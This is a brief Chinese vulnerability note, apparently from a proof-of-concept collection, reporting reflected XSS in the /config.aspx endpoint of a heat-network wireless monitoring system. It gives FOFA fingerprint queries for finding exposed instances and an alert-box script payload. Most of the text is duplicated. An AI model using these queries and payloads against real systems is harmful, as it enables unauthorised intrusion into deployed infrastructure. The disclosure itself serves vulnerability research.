漏洞描述
热网无线监测系统/config.aspx接口存在反射性XSS漏洞
漏洞复现
FOFA
body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg"
POC
IP+/config.aspx
POC
<script>alert(1)</script>
点击确认成功弹窗1
热网无线监测系统/config.aspx接口存在反射性XSS漏洞
FOFA
body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg"
POC
IP+/config.aspx
POC
<script>alert(1)</script>
点击确认成功弹窗1